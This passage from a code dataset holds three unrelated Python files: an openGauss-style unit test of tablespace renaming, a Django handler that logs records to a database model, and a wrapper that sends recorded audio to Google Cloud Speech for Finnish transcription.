        self.err_flag3 = 'DETAIL: The prefix "pg_" is reserved ' \
                         'for system tablespaces.'

    def test_main(self):
        step_txt = '----step0:创建系统管理员; expect:创建成功----'
        self.log.info(step_txt)
        # Drop possible leftovers from earlier runs, then create the
        # sysadmin user that performs the tablespace operations below.
        create_sql = f"drop tablespace if exists {self.tbspc_name1}; " \
                     f"drop tablespace if exists {self.tbspc_name2}; " \
                     f"drop user if exists {self.sys_user} cascade; " \
                     f"create user {self.sys_user} sysadmin password '{<PASSWORD>}';"
        self.log.info(create_sql)
        create_result = self.sh.execut_db_sql(create_sql)
        self.log.info(create_result)
        # Exactly one CREATE ROLE success message is expected.
        assert_flag = create_result.splitlines().count(
            self.constant.CREATE_ROLE_SUCCESS_MSG)
        self.assertEqual(assert_flag, 1, "执行失败" + step_txt)

        step_txt = '----step0:创建tablespace1; expect:创建成功----'
        self.log.info(step_txt)
        create_sql = f"create tablespace {self.tbspc_name1} " \
                     f"relative location '{self.tbspc_location1}';"
        create_result = self.sh.execut_db_sql(create_sql,
                                              sql_type=self.connect_sys)
        self.log.info(create_result)
        self.assertIn(self.constant.TABLESPCE_CREATE_SUCCESS, create_result,
                      "执行失败" + step_txt)

        self.log.info('--查询tablespace oid--')
        # Remember the tablespace OID so the final rename (step 5) can be
        # verified against the same physical tablespace.
        select_sql = f"select oid from pg_tablespace where " \
                     f"spcname = '{self.tbspc_name1}';"
        # splitlines()[-2] picks the data row out of the gsql result table.
        tblspc1_oid = self.sh.execut_db_sql(select_sql).splitlines()[-2]
        self.log.info(tblspc1_oid)

        step_txt = '----step1:修改不存在的表空间名为另一已存在表空间名; expect:修改失败----'
        self.log.info(step_txt)
        alter_sql = f"alter tablespace {self.tbspc_name2} " \
                    f"rename to {self.tbspc_name1};"
        alter_result = self.sh.execut_db_sql(alter_sql,
                                             sql_type=self.connect_sys)
        self.log.info(alter_result)
        self.assertIn(self.err_flag1, alter_result, "执行失败" + step_txt)

        step_txt = '----step2:修改不存在的表空间名为另一不存在表空间名; expect:修改失败----'
        self.log.info(step_txt)
        alter_sql = f"alter tablespace {self.tbspc_name2} " \
                    f"rename to {self.tbspc_name3};"
        alter_result = self.sh.execut_db_sql(alter_sql,
                                             sql_type=self.connect_sys)
        self.log.info(alter_result)
        self.assertIn(self.err_flag1, alter_result, "执行失败" + step_txt)

        step_txt = '----step0:创建tablespace2; expect:创建成功----'
        self.log.info(step_txt)
        create_sql = f"create tablespace {self.tbspc_name2} " \
                     f"relative location '{self.tbspc_location2}';"
        create_result = self.sh.execut_db_sql(create_sql,
                                              sql_type=self.connect_sys)
        self.log.info(create_result)
        self.assertIn(self.constant.TABLESPCE_CREATE_SUCCESS, create_result,
                      "执行失败" + step_txt)

        step_txt = '----step3:修改已存在的表空间名为另一已存在表空间名; expect:修改失败----'
        self.log.info(step_txt)
        alter_sql = f"alter tablespace {self.tbspc_name1} " \
                    f"rename to {self.tbspc_name2};"
        alter_result = self.sh.execut_db_sql(alter_sql,
                                             sql_type=self.connect_sys)
        self.log.info(alter_result)
        self.assertIn(self.err_flag2, alter_result, "执行失败" + step_txt)

        step_txt = '----step4:修改已存在的表空间名为pg_开头的表空间名; expect:修改失败----'
        self.log.info(step_txt)
        alter_sql = f"alter tablespace {self.tbspc_name2} " \
                    f"rename to {self.tbspc_name4};"
        alter_result = self.sh.execut_db_sql(alter_sql,
                                             sql_type=self.connect_sys)
        self.log.info(alter_result)
        self.assertIn(self.err_flag3, alter_result, "执行失败" + step_txt)

        step_txt = '----step5:修改已存在的表空间名为不存在表空间名; expect:修改成功----'
        self.log.info(step_txt)
        alter_sql = f"alter tablespace {self.tbspc_name1} " \
                    f"rename to {self.tbspc_name3};"
        alter_result = self.sh.execut_db_sql(alter_sql,
                                             sql_type=self.connect_sys)
        self.log.info(alter_result)
        self.assertIn(self.constant.TABLESPCE_ALTER_SUCCESS, alter_result,
                      "执行失败" + step_txt)

        self.log.info('--查询tablespace所有者--')
        # The row looked up by the OID saved earlier must now carry the
        # new name, proving the rename affected the original tablespace.
        select_sql = f'select spcname from pg_tablespace ' \
                     f'where oid = {tblspc1_oid};'
        new_name = self.sh.execut_db_sql(select_sql).splitlines()[-2].strip()
        self.log.info(new_name)
        self.assertEqual(self.tbspc_name3, new_name)

    def tearDown(self):
        # Clean up all three possible tablespace names (name1 may have
        # been renamed to name3) and the sysadmin user.
        self.log.info('----this is teardown----')
        step1_txt = '----清理表空间及用户; expect:成功----'
        self.log.info(step1_txt)
        clean_sql = f"drop tablespace if exists {self.tbspc_name1}; " \
                    f"drop tablespace if exists {self.tbspc_name2}; " \
                    f"drop tablespace if exists {self.tbspc_name3}; " \
                    f"drop user if exists {self.sys_user} cascade; "
        clean_result = self.sh.execut_db_sql(clean_sql)
        self.log.info(clean_result)
        self.log.info(f'-----{os.path.basename(__file__)} end-----')
        drop_user = clean_result.count(self.constant.DROP_ROLE_SUCCESS_MSG)
        drop_tbspc = clean_result.count(self.constant.TABLESPCE_DROP_SUCCESS)
        self.assertEqual(1, drop_user, "执行失败" + step1_txt)
        # "drop if exists" succeeds for all three names even though only
        # two tablespaces exist at any time.
        self.assertEqual(3, drop_tbspc, "执行失败" + step1_txt)
| StarcoderdataPython |
1743175 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from logging import Handler
class DBLogHandler(Handler, object):
    """Logging handler that persists log records to the DBLogEntry model."""

    def __init__(self):
        super(DBLogHandler, self).__init__()

    def emit(self, record):
        """Store *record* as a DBLogEntry row.

        ``event``, ``event_id`` and ``user`` are optional extras that
        callers may attach to the log record; they are copied over only
        when present.
        """
        # Imported lazily so the handler can be configured before the
        # Django app registry / models are ready.
        from .models import DBLogEntry as _LogEntry

        entry = _LogEntry()
        entry.level = record.levelname
        entry.message = self.format(record)
        entry.module = record.name
        # Prefer a full `event` object; fall back to a bare `event_id`.
        # (Previously implemented with nested bare `except:` blocks, which
        # also swallowed unrelated errors raised by the assignments.)
        if hasattr(record, 'event'):
            entry.event = record.event
        elif hasattr(record, 'event_id'):
            entry.event_id = record.event_id
        if hasattr(record, 'user'):
            entry.user = record.user
        entry.save()
| StarcoderdataPython |
8005473 | <filename>homeserver/voice_control/google_speech.py
#!/usr/bin/env python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import os
# Imports the Google Cloud client library
# [START speech_python_migration_imports]
from google.cloud import speech
from google.cloud.speech import enums, types
# class for recording
from homeserver.voice_control.voice_service import record_audio
class GoogleVoiceRecognition():
    """Thin wrapper around the Google Cloud Speech-to-Text client.

    Records a short audio command from the microphone and sends it to
    Google for transcription (LINEAR16, 16 kHz, Finnish by default).
    """

    def __init__(self, google_api_credential_path):
        """Build the speech client from a service-account JSON file.

        :param google_api_credential_path: absolute path to the Google API
            credential JSON (loaded from server.ini).
        """
        print("initialising google voice recognition")
        # Create the client from a credential json instead of relying on
        # the GOOGLE_APPLICATION_CREDENTIALS environment variable.
        self.client = speech.SpeechClient.from_service_account_file(
            google_api_credential_path)

    def listen_to_command(self):
        """Record a short command from the microphone and transcribe it.

        Returns the transcript string, or None when the client is missing,
        the recording failed, or nothing was recognised.
        """
        command_time = 4  # seconds of audio to capture
        print("Starting recording for google")
        if not self.client:
            print("no client for google")
            return None
        # Listen to the microphone and write the capture to a scratch file.
        file_name = record_audio(
            command_time,
            os.path.join(os.path.dirname(__file__), 'resources',
                         'mysound.vaw'))
        if not file_name:
            print("failure in recording")
            return None
        # Fix: the transcription result was previously discarded; return
        # it to the caller so the recognised command can actually be used.
        return self.interpret_command(file_name)

    def interpret_command(self, file_name, keyphrases=None):
        """
        Sends given audio file (with full path) to google and returns
        the interpreted speech as string (None when nothing recognised).

        Keyphrases is an optional list of strings that helps google notice
        keywords.
        """
        # Fix: avoid the mutable-default-argument pitfall (was `=[]`).
        if keyphrases is None:
            keyphrases = []
        print("sending audio to google")
        # Loads the audio into memory
        with io.open(file_name, 'rb') as audio_file:
            content = audio_file.read()
        audio = types.RecognitionAudio(content=content)
        # loads the keyphrases into an object
        speech_context = speech.types.SpeechContext(phrases=keyphrases)
        config = types.RecognitionConfig(
            encoding=enums.RecognitionConfig.AudioEncoding.LINEAR16,
            sample_rate_hertz=16000,
            language_code='fi-FI',  # en-US
            speech_contexts=[speech_context])
        # Detects speech in the audio file
        response = self.client.recognize(config, audio)
        # Only the first result's top alternative is of interest.
        for result in response.results:
            print('Transcript: {}'.format(result.alternatives[0].transcript))
            return result.alternatives[0].transcript
        return None
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.